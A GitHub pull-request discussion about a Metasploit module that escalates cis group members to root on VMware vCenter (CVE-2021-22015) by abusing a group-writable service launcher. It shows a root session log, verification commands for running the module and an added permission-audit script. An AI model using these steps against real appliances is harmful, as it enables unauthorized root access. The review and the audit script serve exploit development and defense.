CVE-2021-22015 vCenter priv esc #17286
Conversation
@U1traVio1et since you uploaded the code on https://github.com/PenteraIO/vScalation-CVE-2021-22015 wanted to make sure the vuln discoverer was properly credited.

love this, thanks!
```ruby
          'Yuval Lazar' # original PoC, analysis
        ],
        'Platform' => [ 'linux' ],
        'Arch' => [ ARCH_X86, ARCH_X64 ],
```
VCenter has an x86 version?
no idea, but x86 payloads do run on the appliance:
```
msf6 exploit(multi/script/web_delivery) > sessions -i 1
[*] Starting interaction with 1...

whoami
root
uname -a
Linux localhost.domain 4.4.8 #1-photon SMP Fri Oct 21 20:13:51 UTC 2016 x86_64 GNU/Linux
vpxd -v
Traceback (most recent call last):
  File "/usr/sbin/cloudvm-ram-size", line 52, in <module>
    sys.path.append(os.environ['VMWARE_PYTHON_PATH'])
  File "/usr/lib/python2.7/UserDict.py", line 40, in __getitem__
    raise KeyError(key)
KeyError: 'VMWARE_PYTHON_PATH'
VMware VirtualCenter 6.5.0 build-7070488
^Z
Background session 1? [y/N]  y
msf6 exploit(linux/local/vcenter_java_wrapper_vmon_priv_esc) > sessions -l

Active sessions
===============

  Id  Name  Type             Information  Connection
  --  ----  ----             -----------  ----------
  1         shell x86/linux               1.1.1.1:4444 -> 2.2.2.2:57524 (2.2.2.2)
```
Is the cleanup working correctly?

Because it is no longer after 5 on a Friday, it appears to work fine?

Yeah; I cannot seem to re-create what was happening Friday. Today, I can even restart the service when Friday, I had to reboot. The original problem was that the service restart failed and I tried to reboot to kick off the privileged session, so the file would not have been returned to the original state, yet.

I'll also note that it's set to
Release Notes

This PR adds a priv esc for users in the `cis` group to escalate to root on certain versions of vCenter. A service file `/usr/lib/vmware-vmon/java-wrapper-vmon` has improper permissions allowing `cis` group members to write to it. Upon host reboot or `vmware-vmon` service restart, a root shell is obtained.

Fixes #16489

Verification

- Obtain a session as a user in the `cis` group. (I used `su vsphere-client` off an SSH session)
- `use exploit/linux/local/vcenter_java_wrapper_vmon_priv_esc`
- `set session #`
- `run`
- Restart the service (`systemctl restart vmware-vmon.service`) with a user who has permission
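As an added example (not code from the PR or from the Metasploit module it reviews), here is a POSIX shell audit of the condition the release notes describe: a launcher file that a privileged service executes but that is writable by a group the service does not trust. It assumes a GNU/Linux userland (`ls`, `awk`, `cut`, `mktemp`), uses the `/usr/lib/vmware-vmon/java-wrapper-vmon` name from the PR only for constructed temp files rather than touching a real appliance, and places the remediation (`chmod go-w`) next to the check so the "cleanup" question raised in the review can be answered by re-running the audit after a test.

```sh
#!/bin/sh
# Added example, not code from the PR or the Metasploit module it reviews.
# Audits whether a service launcher file can be modified by anyone other than
# its owner, the misconfiguration the PR describes for
# /usr/lib/vmware-vmon/java-wrapper-vmon (path taken from the PR). Everything
# executed here runs against constructed temp files, never a real appliance.

# check_service_file PATH
# Prints one line: "WRITABLE <path> <mode> <owner>:<group>" when the group or
# world write bit is set, "OK ..." otherwise, "MISSING <path>" if absent.
# Always returns 0 so it is safe under `set -e` and inside $(...).
check_service_file() {
    f="$1"
    if [ ! -e "$f" ]; then
        echo "MISSING $f"
        return 0
    fi
    # ls -ld output: "-rwxrwxr-x 1 owner group size date name"
    line=$(ls -ld "$f")
    mode=$(printf '%s\n' "$line" | cut -c1-10)
    owner=$(printf '%s\n' "$line" | awk '{print $3}')
    group=$(printf '%s\n' "$line" | awk '{print $4}')
    gw=$(printf '%s\n' "$mode" | cut -c6)   # group write bit (position 6)
    ow=$(printf '%s\n' "$mode" | cut -c9)   # other write bit (position 9)
    if [ "$gw" = "w" ] || [ "$ow" = "w" ]; then
        echo "WRITABLE $f $mode $owner:$group"
    else
        echo "OK $f $mode $owner:$group"
    fi
    return 0
}

# remediate_service_file PATH
# Strips the group/other write bits; the service can still execute the file,
# but group members can no longer replace its contents.
remediate_service_file() {
    chmod go-w "$1"
}

# verdict_for_mode OCTAL_MODE
# Demo helper: creates a constructed launcher file with the given mode in a
# temp dir, audits it, prints only the verdict word, and cleans up.
verdict_for_mode() {
    tmp=$(mktemp -d)
    f="$tmp/java-wrapper-vmon"
    printf '#!/bin/sh\nexec /usr/bin/env java "$@"\n' > "$f"   # constructed stand-in
    chmod "$1" "$f"
    check_service_file "$f" | cut -d' ' -f1
    rm -rf "$tmp"
}

# verdict_after_remediation
# Demo helper: constructed group-writable (775) file, remediated, re-audited.
verdict_after_remediation() {
    tmp=$(mktemp -d)
    f="$tmp/java-wrapper-vmon"
    : > "$f"
    chmod 775 "$f"
    remediate_service_file "$f"
    check_service_file "$f" | cut -d' ' -f1
    rm -rf "$tmp"
}

# Demo output when run directly
echo "775   -> $(verdict_for_mode 775)"          # WRITABLE
echo "755   -> $(verdict_for_mode 755)"          # OK
echo "fixed -> $(verdict_after_remediation)"     # OK
```

On a live system the audit is `check_service_file /usr/lib/vmware-vmon/java-wrapper-vmon`, and the same condition can be swept across a whole directory with `find /usr/lib/vmware-vmon -type f \( -perm -g=w -o -perm -o=w \)`. Comparing the verdict (and a checksum of the file) before and after a test run is a direct way to confirm the module's cleanup restored the file, which is the gap the reviewers were probing when the service restart failed and the host had to be rebooted.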